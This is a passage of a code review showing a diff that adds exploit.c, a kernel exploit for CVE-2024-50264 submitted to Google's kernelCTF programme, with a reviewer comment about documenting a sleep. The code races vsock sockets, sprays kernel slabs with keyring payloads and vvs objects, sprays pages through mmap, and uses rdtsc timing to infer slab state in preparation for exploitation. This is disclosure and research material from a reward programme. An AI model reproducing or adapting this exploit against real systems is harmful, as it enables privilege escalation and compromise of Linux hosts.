pocs/linux/kernelctf/CVE-2024-50264_lts_cos/exploit/cos-109-17800.309.84/exploit.c

```diff
@@ -0,0 +1,851 @@
+}
+
+char stack[0x100000];
+int race_trigger(void *arg)
+{
+	struct sockaddr_vm connect_addr = {0};
+	struct sockaddr_vm listen_addr = {0};
+	pid_t conn_pid, listen_pid;
+	unsigned int parent_seed = generate_seed();
+	unsigned int child_seed = generate_seed();
+
+	int socket_a = socket(AF_VSOCK, SOCK_SEQPACKET, 0);
+	int socket_b = socket(AF_VSOCK, SOCK_SEQPACKET, 0);
+
+	cid_port_num++;
+
+	connect_addr.svm_family = AF_VSOCK;
+	connect_addr.svm_cid = VMADDR_CID_LOCAL;
+	connect_addr.svm_port = cid_port_num;
+
+	listen_addr.svm_family = AF_VSOCK;
+	listen_addr.svm_cid = VMADDR_CID_LOCAL;
+	listen_addr.svm_port = cid_port_num;
+	bind(socket_a, (struct sockaddr *)&listen_addr, sizeof(listen_addr));
+
+	listen(socket_a, 0);
+
+	unsigned long size = (PHYS_LO_32 | (0x067)) & (0xffffffff);
+	setsockopt(socket_a, AF_VSOCK, SO_VM_SOCKETS_BUFFER_MIN_SIZE, &size, sizeof(size));
+	size = 0x1234;
+	setsockopt(socket_a, AF_VSOCK, SO_VM_SOCKETS_BUFFER_SIZE, &size, sizeof(size));
+
+	_pin_to_cpu(HELPER_CPU);
+	generate_full_slabs_with_user_key_payload();
+	for (int i = 0; i < N_PAGESPRAY; i++) {
+		page_spray[i] = mmap((void*)(0xdead0000000UL + i*MMAP_SIZE),
+							MMAP_SIZE, PROT_READ|PROT_WRITE,
+							MAP_ANONYMOUS|MAP_SHARED, -1, 0);
+		if (page_spray[i] == MAP_FAILED) panic("mmap");
+	}
+
+	// for(int i=0; i < N_PAGESPRAY; i++)
+	// 	*(uint64_t *)(page_spray[i]) = (i << 16);
+	// printf("p4d spray fin\n");
+
+	int tfd1 = timerfd_create(CLOCK_MONOTONIC, 0);
+	int tfd2 = timerfd_create(CLOCK_MONOTONIC, 0);
+	int tfd3 = timerfd_create(CLOCK_MONOTONIC, 0);
+	int tfd4 = timerfd_create(CLOCK_MONOTONIC, 0);
+	unsigned long tmp;
+
+	int communicate_pipe[2];
+	char comm_buf[4];
+	pipe(communicate_pipe);
+	int v = random_in_range(1, 10);
+	conn_pid = fork();
+
+	if (conn_pid == 0) {
+		int vv = 0xffff;
+		char desc[16] = {};
+		snprintf(desc, sizeof(desc) - 1, "-%d", ++vv);
+		add_key(KEYRING_TYPE_USER, desc, &payload, KEYRING_KMALLOC_96, KEY_SPEC_PROCESS_KEYRING);
+		
+		int *fds[0x28];
+		for(int i=0; i<0x28; i++) 
+			fds[i] = generate_spray_vvs_fd(OBJS_PER_SLAB);
+		int *checkfd = generate_spray_vvs_fd(OBJS_PER_SLAB);
+		int *remainfd = generate_spray_vvs_fd(OBJS_PER_SLAB);
+		for(int i=0; i<0x20; i++) 
+			spray_vvs(fds[i], OBJS_PER_SLAB);
+
+		uint64_t times[OBJS_PER_SLAB];
+		uint64_t t0, t1;
+		snprintf(desc, sizeof(desc) - 1, "-%d", ++vv);
+		key_serial_t keyv;
+		for(int i=0; i<OBJS_PER_SLAB; i++)
+		{
+			spray_vvs(&checkfd[i], 1);
+			sched_yield();
+			t0 = rdtsc_begin();
+			keyv = create_keyring(KEYRING_TYPE_USER, desc, &payload, KEYRING_KMALLOC_96, KEY_SPEC_PROCESS_KEYRING);
+			t1 = rdtsc_end();
+			times[i] = t1-t0;
+		}
+
+		// for(int i=0; i<OBJS_PER_SLAB; i++)
+		// 	printf("%d: %d\n", i, times[i]);
+
+		int inuse = -1, currv = 0;
+		for(int i=OBJS_PER_SLAB-1; i>=0; i--)
+			if(times[i] > 5500)
+			{
+				inuse = OBJS_PER_SLAB - i;
+				break;
+			}
+		
+		printf("inuse: %d\n", inuse);
+		usleep(10000);
```

Comment:
Please comment here what you are waiting for (which kernel function): https://google.github.io/security-research/kernelctf/style_guide#sleeping--waiting